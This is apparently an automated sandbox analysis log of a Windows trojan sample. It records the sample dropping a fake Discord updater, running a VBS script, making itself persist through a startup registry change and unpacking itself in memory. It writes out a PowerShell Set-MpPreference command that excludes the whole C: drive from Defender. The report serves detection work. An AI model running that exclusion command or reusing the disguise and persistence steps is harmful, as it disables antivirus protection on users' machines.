Source: 0kEuVjiCbh.exe, 00000001.00000002.328677400.0000000003571000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameFwiakvndmqwxftcyids.dllH vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000001.00000002.325465115.00000000002BC000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp7.exe4 vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000001.00000002.353282151.0000000007F20000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000001.00000002.327234439.0000000002571000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000001.00000002.352544868.0000000007B80000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000001.00000002.352544868.0000000007B80000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000001.00000002.342020708.0000000006F00000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000001.00000002.342076265.0000000006F10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 0000000E.00000002.314784173.000000000061C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp7.exe4 vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000011.00000002.318042337.000000000022C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp7.exe4 vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000012.00000002.321440090.00000000006AC000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp7.exe4 vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000013.00000003.442629868.0000000001821000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameD3D10Warp.dllj% vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000013.00000002.478474356.0000000003230000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe, 00000013.00000002.475958626.000000000118C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp7.exe4 vs 0kEuVjiCbh.exe
Source: 0kEuVjiCbh.exe	Binary or memory string: OriginalFilenameConsoleApp7.exe4 vs 0kEuVjiCbh.exe

Source: 0kEuVjiCbh.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: classification engine

Classification label: mal100.troj.evad.winEXE@14/11@0/1

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_0047E75C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,

19_2_0047E75C

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_00422D5E __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,

19_2_00422D5E

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3216:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Mutant created: \Sessions\1\BaseNamedObjects\6e778527c34ab392d94edc87881870da

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

File created: C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs

Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs'

Source: 0kEuVjiCbh.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0kEuVjiCbh.exe	Virustotal: Detection: 22%
Source: 0kEuVjiCbh.exe	Metadefender: Detection: 14%
Source: 0kEuVjiCbh.exe	ReversingLabs: Detection: 47%

Source: 0kEuVjiCbh.exe	String found in binary or memory: id-cmc-addExtensions
Source: 0kEuVjiCbh.exe	String found in binary or memory: set-addPolicy

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

File read: C:\Users\user\Desktop\0kEuVjiCbh.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0kEuVjiCbh.exe 'C:\Users\user\Desktop\0kEuVjiCbh.exe'
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs'
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs'	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe'	Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 0kEuVjiCbh.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 0kEuVjiCbh.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 0kEuVjiCbh.exe

Static file information: File size 2553856 > 1048576

Source: 0kEuVjiCbh.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x208200

Source: 0kEuVjiCbh.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 0kEuVjiCbh.exe, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: discupdate.exe.1.dr, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0kEuVjiCbh.exe.1.dr, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 1.2.0kEuVjiCbh.exe.b0000.0.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 1.0.0kEuVjiCbh.exe.b0000.0.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.0kEuVjiCbh.exe.410000.0.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.2.0kEuVjiCbh.exe.410000.0.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.0kEuVjiCbh.exe.20000.0.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.0kEuVjiCbh.exe.20000.0.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 18.2.0kEuVjiCbh.exe.4a0000.0.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 18.0.0kEuVjiCbh.exe.4a0000.0.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.2.0kEuVjiCbh.exe.f80000.1.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.0.0kEuVjiCbh.exe.f80000.0.unpack, Vkeagj.Connections/Status.cs	.Net Code: FillSerializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_004FA652 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_004FA652

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_06FB9E3D push es; ret	1_2_06FB9E4C
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_06FB9E21 push es; ret	1_2_06FB9E28
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_06FB9E06 push es; retf	1_2_06FB9E0C
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_06FB8F90 push es; ret	1_2_06FB8FA0
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0068A4A9 push ecx; ret	19_2_0068A4BC
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0068B486 push ecx; ret	19_2_0068B499

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	File created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe			Jump to dropped file
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe			Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe\:Zone.Identifier:$DATA	Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
